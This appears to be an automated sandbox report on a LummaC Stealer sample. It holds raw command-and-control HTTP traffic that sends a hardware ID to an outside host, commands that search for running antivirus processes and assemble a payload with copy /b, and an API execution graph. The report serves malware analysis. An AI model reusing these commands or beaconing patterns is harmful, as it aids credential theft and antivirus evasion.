                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 1135
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:30 UTC1135OUTData Raw: 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41 0d 0a 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 37 50 49 59 43 35 4f 57 31 41 45 41 30 33 4f 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39
                                                                                                                                          Data Ascii: --N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="hwid"0291758F5FC49A8DE9E2F0D64B3B48BA--N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="pid"1--N7PIYC5OW1AEA03O2Content-Disposition: form-data; name="lid"HpOoIh--3fe7f419
                                                                                                                                          2025-01-10 11:06:31 UTC1125INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:31 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=o5fdh5gqos3053mnibgmjl9rd1; expires=Tue, 06 May 2025 04:53:09 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LPL2om7510x7%2BkY8SLJsakuYGxUNASTN2kuglXsQiZT08zGyWT8YB1SmiAg9EWwiivYErId6CU%2Byb6dhDIdOViPQWtie8JDyX5Tbdfpe8WAyDeMg1ZQsPEaCOPJOj%2FPvAD%2Bg"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc32b5bb2dde95-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1650&rtt_var=637&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2840&recv_bytes=2051&delivery_rate=1692753&cwnd=242&unsent_bytes=0&cid=ba5dc84a61a3c044&ts=1204&x=0"
                                                                                                                                          2025-01-10 11:06:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                          Data Ascii: fok 8.46.123.189
                                                                                                                                          2025-01-10 11:06:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                          8192.168.2.449745104.21.64.14434504C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          2025-01-10 11:06:32 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                          Content-Length: 121
                                                                                                                                          Host: sputnik-1985.com
                                                                                                                                          2025-01-10 11:06:32 UTC121OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 33 66 65 37 66 34 31 39 61 33 36 30 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 30 32 39 31 37 35 38 46 35 46 43 34 39 41 38 44 45 39 45 32 46 30 44 36 34 42 33 42 34 38 42 41
                                                                                                                                          Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--3fe7f419a360&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=0291758F5FC49A8DE9E2F0D64B3B48BA
                                                                                                                                          2025-01-10 11:06:32 UTC1132INHTTP/1.1 200 OK
                                                                                                                                          Date: Fri, 10 Jan 2025 11:06:32 GMT
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                          Connection: close
                                                                                                                                          Set-Cookie: PHPSESSID=k5gmhudvqm6g0uiladb366hcbb; expires=Tue, 06 May 2025 04:53:11 GMT; Max-Age=9999999; path=/
                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                          Pragma: no-cache
                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                          vary: accept-encoding
                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G11beuzAlnFPBwqs7G1xxt%2BY%2BPncewTRSX%2By377dVZk9dEj96X2wuC7c7W2LhjFWlnVN9ffKYKvmTOIj4M3%2F4%2FimSfFRlI9%2BRPwELxa8Y9KL%2FpUjJT4v3%2Bw7EwAr6Hv86ulH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                          Server: cloudflare
                                                                                                                                          CF-RAY: 8ffc32c06e55c358-EWR
                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1674&min_rtt=1659&rtt_var=653&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1022&delivery_rate=1638608&cwnd=155&unsent_bytes=0&cid=97aad50b73fe15ec&ts=468&x=0"
                                                                                                                                          2025-01-10 11:06:32 UTC54INData Raw: 33 30 0d 0a 51 34 50 43 39 42 4e 30 61 37 75 47 46 6f 35 66 79 38 78 69 54 44 64 71 49 67 70 6a 6a 36 6c 5a 6b 43 6d 38 6d 39 6e 31 4b 30 6b 59 33 67 3d 3d 0d 0a
                                                                                                                                          Data Ascii: 30Q4PC9BN0a7uGFo5fy8xiTDdqIgpjj6lZkCm8m9n1K0kY3g==
                                                                                                                                          2025-01-10 11:06:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                          Data Ascii: 0


                                                                                                                                          Click to jump to process

                                                                                                                                          Click to jump to process

                                                                                                                                          Click to dive into process behavior distribution

                                                                                                                                          Click to jump to process

                                                                                                                                          Target ID:0
                                                                                                                                          Start time:06:05:53
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Users\user\Desktop\HouseholdsClicking.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Users\user\Desktop\HouseholdsClicking.exe"
                                                                                                                                          Imagebase:0x400000
                                                                                                                                          File size:1'051'945 bytes
                                                                                                                                          MD5 hash:C3C0FBE6393929C60E63885BAB2603F6
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:low
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:1
                                                                                                                                          Start time:06:05:54
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c copy Highways Highways.cmd && Highways.cmd
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:2
                                                                                                                                          Start time:06:05:54
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:862'208 bytes
                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:3
                                                                                                                                          Start time:06:05:57
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:tasklist
                                                                                                                                          Imagebase:0xde0000
                                                                                                                                          File size:79'360 bytes
                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:4
                                                                                                                                          Start time:06:05:57
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                          File size:29'696 bytes
                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:5
                                                                                                                                          Start time:06:05:57
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:tasklist
                                                                                                                                          Imagebase:0xde0000
                                                                                                                                          File size:79'360 bytes
                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:6
                                                                                                                                          Start time:06:05:57
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                          Imagebase:0x470000
                                                                                                                                          File size:29'696 bytes
                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:7
                                                                                                                                          Start time:06:05:58
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /c md 19152
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:8
                                                                                                                                          Start time:06:05:59
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:findstr /V "Bookmarks" Sv
                                                                                                                                          Imagebase:0x470000
                                                                                                                                          File size:29'696 bytes
                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:9
                                                                                                                                          Start time:06:05:59
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:cmd /c copy /b ..\Distance + ..\Butt + ..\Roland + ..\July + ..\Islam + ..\Argentina M
                                                                                                                                          Imagebase:0x240000
                                                                                                                                          File size:236'544 bytes
                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Reputation:high
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:10
                                                                                                                                          Start time:06:05:59
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\19152\Appliance.com
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:Appliance.com M
                                                                                                                                          Imagebase:0xdc0000
                                                                                                                                          File size:947'288 bytes
                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Yara matches:
                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115565079.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115074326.0000000001C8D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000003.1994621887.0000000001CA5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000002.2115489202.000000000437E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 0000000A.00000003.1995305908.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                          Antivirus matches:
                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                          Has exited:true

                                                                                                                                          Target ID:11
                                                                                                                                          Start time:06:05:59
                                                                                                                                          Start date:10/01/2025
                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                          Imagebase:0x780000
                                                                                                                                          File size:28'160 bytes
                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                          Has elevated privileges:true
                                                                                                                                          Has administrator privileges:true
                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                          Has exited:true

                                                                                                                                          Reset < >

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:17.5%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:21%
                                                                                                                                            Total number of Nodes:1482
                                                                                                                                            Total number of Limit Nodes:25
                                                                                                                                            execution_graph 4175 402fc0 4176 401446 18 API calls 4175->4176 4177 402fc7 4176->4177 4178 401a13 4177->4178 4179 403017 4177->4179 4180 40300a 4177->4180 4182 406831 18 API calls 4179->4182 4181 401446 18 API calls 4180->4181 4181->4178 4182->4178 4183 4023c1 4184 40145c 18 API calls 4183->4184 4185 4023c8 4184->4185 4188 407296 4185->4188 4191 406efe CreateFileW 4188->4191 4192 406f30 4191->4192 4193 406f4a ReadFile 4191->4193 4194 4062cf 11 API calls 4192->4194 4195 4023d6 4193->4195 4198 406fb0 4193->4198 4194->4195 4196 406fc7 ReadFile lstrcpynA lstrcmpA 4196->4198 4199 40700e SetFilePointer ReadFile 4196->4199 4197 40720f CloseHandle 4197->4195 4198->4195 4198->4196 4198->4197 4200 407009 4198->4200 4199->4197 4201 4070d4 ReadFile 4199->4201 4200->4197 4202 407164 4201->4202 4202->4200 4202->4201 4203 40718b SetFilePointer GlobalAlloc ReadFile 4202->4203 4204 4071eb lstrcpynW GlobalFree 4203->4204 4205 4071cf 4203->4205 4204->4197 4205->4204 4205->4205 4206 401cc3 4207 40145c 18 API calls 4206->4207 4208 401cca lstrlenW 4207->4208 4209 4030dc 4208->4209 4210 4030e3 4209->4210 4212 405f7d wsprintfW 4209->4212 4212->4210 4213 401c46 4214 40145c 18 API calls 4213->4214 4215 401c4c 4214->4215 4216 4062cf 11 API calls 4215->4216 4217 401c59 4216->4217 4218 406cc7 81 API calls 4217->4218 4219 401c64 4218->4219 4220 403049 4221 401446 18 API calls 4220->4221 4222 403050 4221->4222 4223 406831 18 API calls 4222->4223 4224 401a13 4222->4224 4223->4224 4225 40204a 4226 401446 18 API calls 4225->4226 4227 402051 IsWindow 4226->4227 4228 4018d3 4227->4228 4229 40324c 4230 403277 4229->4230 4231 40325e SetTimer 4229->4231 4232 4032cc 4230->4232 4233 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4230->4233 4231->4230 4233->4232 4234 4022cc 4235 40145c 18 API calls 4234->4235 4236 4022d3 4235->4236 4237 406301 2 API calls 4236->4237 4238 4022d9 4237->4238 4240 4022e8 4238->4240 4243 405f7d wsprintfW 4238->4243 4241 4030e3 4240->4241 4244 405f7d wsprintfW 4240->4244 4243->4240 4244->4241 4245 4030cf 4246 40145c 18 API calls 4245->4246 4247 4030d6 4246->4247 4249 4030dc 4247->4249 4252 4063d8 GlobalAlloc lstrlenW 4247->4252 4250 4030e3 4249->4250 4279 405f7d wsprintfW 4249->4279 4253 406460 4252->4253 4254 40640e 4252->4254 4253->4249 4255 40643b GetVersionExW 4254->4255 4280 406057 CharUpperW 4254->4280 4255->4253 4256 40646a 4255->4256 4257 406490 LoadLibraryA 4256->4257 4258 406479 4256->4258 4257->4253 4261 4064ae GetProcAddress GetProcAddress GetProcAddress 4257->4261 4258->4253 4260 4065b1 GlobalFree 4258->4260 4262 4065c7 LoadLibraryA 4260->4262 4263 406709 FreeLibrary 4260->4263 4264 406621 4261->4264 4268 4064d6 4261->4268 4262->4253 4266 4065e1 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4262->4266 4263->4253 4265 40667d FreeLibrary 4264->4265 4267 406656 4264->4267 4265->4267 4266->4264 4271 406716 4267->4271 4276 4066b1 lstrcmpW 4267->4276 4277 4066e2 CloseHandle 4267->4277 4278 406700 CloseHandle 4267->4278 4268->4264 4269 406516 4268->4269 4270 4064fa FreeLibrary GlobalFree 4268->4270 4269->4260 4272 406528 lstrcpyW OpenProcess 4269->4272 4274 40657b CloseHandle CharUpperW lstrcmpW 4269->4274 4270->4253 4273 40671b CloseHandle FreeLibrary 4271->4273 4272->4269 4272->4274 4275 406730 CloseHandle 4273->4275 4274->4264 4274->4269 4275->4273 4276->4267 4276->4275 4277->4267 4278->4263 4279->4250 4280->4254 4281 4044d1 4282 40450b 4281->4282 4283 40453e 4281->4283 4349 405cb0 GetDlgItemTextW 4282->4349 4284 40454b GetDlgItem GetAsyncKeyState 4283->4284 4288 4045dd 4283->4288 4286 40456a GetDlgItem 4284->4286 4299 404588 4284->4299 4291 403d6b 19 API calls 4286->4291 4287 4046c9 4347 40485f 4287->4347 4351 405cb0 GetDlgItemTextW 4287->4351 4288->4287 4296 406831 18 API calls 4288->4296 4288->4347 4289 404516 4290 406064 5 API calls 4289->4290 4292 40451c 4290->4292 4294 40457d ShowWindow 4291->4294 4295 403ea0 5 API calls 4292->4295 4294->4299 4300 404521 GetDlgItem 4295->4300 4301 40465b SHBrowseForFolderW 4296->4301 4297 4046f5 4302 4067aa 18 API calls 4297->4302 4298 403df6 8 API calls 4303 404873 4298->4303 4304 4045a5 SetWindowTextW 4299->4304 4308 405d85 4 API calls 4299->4308 4305 40452f IsDlgButtonChecked 4300->4305 4300->4347 4301->4287 4307 404673 CoTaskMemFree 4301->4307 4312 4046fb 4302->4312 4306 403d6b 19 API calls 4304->4306 4305->4283 4310 4045c3 4306->4310 4311 40674e 3 API calls 4307->4311 4309 40459b 4308->4309 4309->4304 4316 40674e 3 API calls 4309->4316 4313 403d6b 19 API calls 4310->4313 4314 404680 4311->4314 4352 406035 lstrcpynW 4312->4352 4317 4045ce 4313->4317 4318 4046b7 SetDlgItemTextW 4314->4318 4323 406831 18 API calls 4314->4323 4316->4304 4350 403dc4 SendMessageW 4317->4350 4318->4287 4319 404712 4321 406328 3 API calls 4319->4321 4330 40471a 4321->4330 4322 4045d6 4324 406328 3 API calls 4322->4324 4325 40469f lstrcmpiW 4323->4325 4324->4288 4325->4318 4328 4046b0 lstrcatW 4325->4328 4326 40475c 4353 406035 lstrcpynW 4326->4353 4328->4318 4329 404765 4331 405d85 4 API calls 4329->4331 4330->4326 4334 40677d 2 API calls 4330->4334 4336 4047b1 4330->4336 4332 40476b GetDiskFreeSpaceW 4331->4332 4335 40478f MulDiv 4332->4335 4332->4336 4334->4330 4335->4336 4337 40480e 4336->4337 4354 4043d9 4336->4354 4338 404831 4337->4338 4340 40141d 80 API calls 4337->4340 4362 403db1 KiUserCallbackDispatcher 4338->4362 4340->4338 4341 4047ff 4343 404810 SetDlgItemTextW 4341->4343 4344 404804 4341->4344 4343->4337 4346 4043d9 21 API calls 4344->4346 4345 40484d 4345->4347 4363 403d8d 4345->4363 4346->4337 4347->4298 4349->4289 4350->4322 4351->4297 4352->4319 4353->4329 4355 4043f9 4354->4355 4356 406831 18 API calls 4355->4356 4357 404439 4356->4357 4358 406831 18 API calls 4357->4358 4359 404444 4358->4359 4360 406831 18 API calls 4359->4360 4361 404454 lstrlenW wsprintfW SetDlgItemTextW 4360->4361 4361->4341 4362->4345 4364 403da0 SendMessageW 4363->4364 4365 403d9b 4363->4365 4364->4347 4365->4364 4366 401dd3 4367 401446 18 API calls 4366->4367 4368 401dda 4367->4368 4369 401446 18 API calls 4368->4369 4370 4018d3 4369->4370 4371 402e55 4372 40145c 18 API calls 4371->4372 4373 402e63 4372->4373 4374 402e79 4373->4374 4375 40145c 18 API calls 4373->4375 4376 405e5c 2 API calls 4374->4376 4375->4374 4377 402e7f 4376->4377 4401 405e7c GetFileAttributesW CreateFileW 4377->4401 4379 402e8c 4380 402f35 4379->4380 4381 402e98 GlobalAlloc 4379->4381 4384 4062cf 11 API calls 4380->4384 4382 402eb1 4381->4382 4383 402f2c CloseHandle 4381->4383 4402 403368 SetFilePointer 4382->4402 4383->4380 4386 402f45 4384->4386 4388 402f50 DeleteFileW 4386->4388 4389 402f63 4386->4389 4387 402eb7 4390 403336 ReadFile 4387->4390 4388->4389 4403 401435 4389->4403 4392 402ec0 GlobalAlloc 4390->4392 4393 402ed0 4392->4393 4394 402f04 WriteFile GlobalFree 4392->4394 4396 40337f 33 API calls 4393->4396 4395 40337f 33 API calls 4394->4395 4397 402f29 4395->4397 4400 402edd 4396->4400 4397->4383 4399 402efb GlobalFree 4399->4394 4400->4399 4401->4379 4402->4387 4404 404f9e 25 API calls 4403->4404 4405 401443 4404->4405 4406 401cd5 4407 401446 18 API calls 4406->4407 4408 401cdd 4407->4408 4409 401446 18 API calls 4408->4409 4410 401ce8 4409->4410 4411 40145c 18 API calls 4410->4411 4412 401cf1 4411->4412 4413 401d07 lstrlenW 4412->4413 4414 401d43 4412->4414 4415 401d11 4413->4415 4415->4414 4419 406035 lstrcpynW 4415->4419 4417 401d2c 4417->4414 4418 401d39 lstrlenW 4417->4418 4418->4414 4419->4417 4420 402cd7 4421 401446 18 API calls 4420->4421 4423 402c64 4421->4423 4422 402d17 ReadFile 4422->4423 4423->4420 4423->4422 4424 402d99 4423->4424 4425 402dd8 4426 4030e3 4425->4426 4427 402ddf 4425->4427 4428 402de5 FindClose 4427->4428 4428->4426 4429 401d5c 4430 40145c 18 API calls 4429->4430 4431 401d63 4430->4431 4432 40145c 18 API calls 4431->4432 4433 401d6c 4432->4433 4434 401d73 lstrcmpiW 4433->4434 4435 401d86 lstrcmpW 4433->4435 4436 401d79 4434->4436 4435->4436 4437 401c99 4435->4437 4436->4435 4436->4437 4438 4027e3 4439 4027e9 4438->4439 4440 4027f2 4439->4440 4441 402836 4439->4441 4454 401553 4440->4454 4442 40145c 18 API calls 4441->4442 4444 40283d 4442->4444 4446 4062cf 11 API calls 4444->4446 4445 4027f9 4447 40145c 18 API calls 4445->4447 4451 401a13 4445->4451 4448 40284d 4446->4448 4449 40280a RegDeleteValueW 4447->4449 4458 40149d RegOpenKeyExW 4448->4458 4450 4062cf 11 API calls 4449->4450 4453 40282a RegCloseKey 4450->4453 4453->4451 4455 401563 4454->4455 4456 40145c 18 API calls 4455->4456 4457 401589 RegOpenKeyExW 4456->4457 4457->4445 4461 4014c9 4458->4461 4466 401515 4458->4466 4459 4014ef RegEnumKeyW 4460 401501 RegCloseKey 4459->4460 4459->4461 4463 406328 3 API calls 4460->4463 4461->4459 4461->4460 4462 401526 RegCloseKey 4461->4462 4464 40149d 3 API calls 4461->4464 4462->4466 4465 401511 4463->4465 4464->4461 4465->4466 4467 401541 RegDeleteKeyW 4465->4467 4466->4451 4467->4466 4468 4040e4 4469 4040ff 4468->4469 4475 40422d 4468->4475 4471 40413a 4469->4471 4499 403ff6 WideCharToMultiByte 4469->4499 4470 404298 4472 40436a 4470->4472 4473 4042a2 GetDlgItem 4470->4473 4479 403d6b 19 API calls 4471->4479 4480 403df6 8 API calls 4472->4480 4476 40432b 4473->4476 4477 4042bc 4473->4477 4475->4470 4475->4472 4478 404267 GetDlgItem SendMessageW 4475->4478 4476->4472 4481 40433d 4476->4481 4477->4476 4485 4042e2 6 API calls 4477->4485 4504 403db1 KiUserCallbackDispatcher 4478->4504 4483 40417a 4479->4483 4484 404365 4480->4484 4486 404353 4481->4486 4487 404343 SendMessageW 4481->4487 4489 403d6b 19 API calls 4483->4489 4485->4476 4486->4484 4490 404359 SendMessageW 4486->4490 4487->4486 4488 404293 4491 403d8d SendMessageW 4488->4491 4492 404187 CheckDlgButton 4489->4492 4490->4484 4491->4470 4502 403db1 KiUserCallbackDispatcher 4492->4502 4494 4041a5 GetDlgItem 4503 403dc4 SendMessageW 4494->4503 4496 4041bb SendMessageW 4497 4041e1 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4496->4497 4498 4041d8 GetSysColor 4496->4498 4497->4484 4498->4497 4500 404033 4499->4500 4501 404015 GlobalAlloc WideCharToMultiByte 4499->4501 4500->4471 4501->4500 4502->4494 4503->4496 4504->4488 4505 402ae4 4506 402aeb 4505->4506 4507 4030e3 4505->4507 4508 402af2 CloseHandle 4506->4508 4508->4507 4509 402065 4510 401446 18 API calls 4509->4510 4511 40206d 4510->4511 4512 401446 18 API calls 4511->4512 4513 402076 GetDlgItem 4512->4513 4514 4030dc 4513->4514 4515 4030e3 4514->4515 4517 405f7d wsprintfW 4514->4517 4517->4515 4518 402665 4519 40145c 18 API calls 4518->4519 4520 40266b 4519->4520 4521 40145c 18 API calls 4520->4521 4522 402674 4521->4522 4523 40145c 18 API calls 4522->4523 4524 40267d 4523->4524 4525 4062cf 11 API calls 4524->4525 4526 40268c 4525->4526 4527 406301 2 API calls 4526->4527 4528 402695 4527->4528 4529 4026a6 lstrlenW lstrlenW 4528->4529 4531 404f9e 25 API calls 4528->4531 4533 4030e3 4528->4533 4530 404f9e 25 API calls 4529->4530 4532 4026e8 SHFileOperationW 4530->4532 4531->4528 4532->4528 4532->4533 4534 401c69 4535 40145c 18 API calls 4534->4535 4536 401c70 4535->4536 4537 4062cf 11 API calls 4536->4537 4538 401c80 4537->4538 4539 405ccc MessageBoxIndirectW 4538->4539 4540 401a13 4539->4540 4541 402f6e 4542 402f72 4541->4542 4543 402fae 